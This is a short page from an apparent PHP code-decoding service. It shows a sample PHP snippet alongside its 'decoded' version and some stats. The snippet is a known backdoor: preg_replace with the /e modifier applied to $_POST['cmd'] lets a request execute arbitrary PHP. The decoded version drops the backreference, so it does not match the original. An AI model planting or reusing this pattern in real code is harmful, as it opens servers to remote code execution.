Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function funfunc($str){} echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc(..
Decoded Output download
<?php
function funfunc($str){}
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("")', $_POST["cmd"]);
?>
Did this file decode correctly?
Original Code
<?php
function funfunc($str){}
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
Function Calls
preg_replace | 1 |
Stats
MD5 | 07bacdc32ad544e74c316588f1d39a5a |
Eval Count | 0 |
Decode Time | 133 ms |